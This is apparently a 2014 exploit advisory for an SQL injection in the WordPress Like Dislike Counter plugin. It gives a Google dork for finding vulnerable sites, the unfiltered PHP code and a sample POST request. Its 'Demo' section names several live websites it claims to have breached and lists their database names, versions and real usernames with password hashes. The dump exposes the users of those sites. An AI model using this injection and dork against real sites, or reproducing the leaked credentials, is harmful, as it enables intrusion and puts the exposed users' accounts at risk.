#################################################################################################
#
# Title                : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk                 : High+/Critical
# Exploit Author       : XroGuE
# Google Dork          : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php  AND  plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version       : 1.2.3
# Plugin Name          : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home          : www.wpfruits.com
# Date                 : 2014/09/05
# Tested in            : Win7 - Linux
#
##################################################################################################
# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version).
#
# PoC :
#
# http://localhost/wp/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
#
# Vulnerable Page : ajax_counter.php
#
#  if (!$changedDir)$changedDir = preg_replace('|wp-content.*$|','',__FILE__);
#  include_once($changedDir.'/wp-config.php');
#  if(isset($_COOKIE['ul_post_cnt']))
#  {
#  $posts_present=$_COOKIE['ul_post_cnt'];
#  }
#  else
#  {
#  $posts_present=array();
#  }
#   // Here ------------------------> Inputs Not Filtered ! :|
#  $post_id=$_POST['post_id'];
#  $up_type=$_POST['up_type'];
#   // Here <------------------------
#  if($up_type=='c_like'||$up_type=='c_dislike')
#  {
#  $for_com='c_';
#  }
#  else
#  {
#  $for_com='';
#  }
#  if(!in_array($for_com.$post_id,$posts_present))
#  {
#  update_post_ul_meta($post_id,$up_type);
#  }
#  echo get_post_ul_meta($post_id,$up_type);
#
##################################################################################################
# POST wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 AlexaToolbar/alxf-2.21
# Accept: */*
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# X-Requested-With: XMLHttpRequest
# Referer: http://localhost/wp/
# Content-Length: 24
# Connection: keep-alive
# Pragma: no-cache
# Cache-Control: no-cache
# post_id=1&up_type=like
##################################################################################################
#
# Demo :
#
#    http://plugins.wpfruits.com/like-dislike/wp-content/plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# => database: tikendra_wpf-plugins
# => Version : 5.5.37-35.1
#
#
#
#    http://prettyhipsounds.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
# => Database:pre1302309360573
# => Version : 5.0.96-log
# => Users   : cemruso:$P$BKlsLJRwcdsKcdRdwyrqLbM7tJKENC.,manolyasagisman:$P$B8eZQzrHSTuWiF4bFX3Yrm0cI7rAFP1,ekinsezgen:$P$BskJZO4e6qkLT5HX2U928SRhO/Ekg4.,hedazs35:$P$BoBHjAZAJCWvXb7IF9t/Kb0DJpGoir1,yhdbhet5e:$P$Bsl67YzrizI.29yr1y1BzbUJmkrJuT1,olandonanto:$P$BVyD5JJKOuRMR/Cq6u.VFWP.HV8Okn1,vt1f6zfo0:$P$BMSQwc1hKlJvo.4/5oddH62gKFrfBL1,lxbc4fyi:$P$BJD5FOSx
#
#
#
#    http://www.dropboxwiki.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
# => Database: wp_dropboxwiki
# => Version : 5.5.31-30.3-log
# => prefix  : u2ffvh
# => Users   : nathan:$P$B9cFMVh7xTnh9ewmBDylwcn1zOMjTa/,andy:$P$BIGexE1YxoK0Y6AI4C29X6yse039Gl1,chris:$P$ByJuX/oNlNcCni7NO8/mTAtUQ/Bz/A/,mark:$P$BdQh8JbAEbtwnZhFZQA96afhc4e/Kq/,tommy:$P$BWHket1yb/Aybpm9RViVcw2o6UcAzg.,Endeavour:$P$B0gdPF/kjiO4nqin.WhHEkwlFPyC0/0,dgw:$P$B6gYWX8G/1w5vXXcmX.Q4cIrl3eL10.,ops@axentra.com:$P$BSjAU.VnHzE62yuXLEeOvwci/CeWOT/,jr
#
#
#
#    http://xploit.ir/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php
# => Database: mrcicili_xploitdb
# => users   : xploitadminblog:$P$BVKlsUqLMQNiARyZYxQGY0mFB4.DjG0,Leonie4295:$P$Btyo/bqbXcpoICDO7gcbVyJlcC4yWa0,p-41:$P$BAItbiw3K7uFMT70JZba2IfNOGWgjL0
#
##################################################################################################
#
# Founded By : XroGuE
# Website    : http://www.Att4ck3r.ir
# E-Mail     : info[at]att4ck3r[Dot]ir
#
##################################################################################################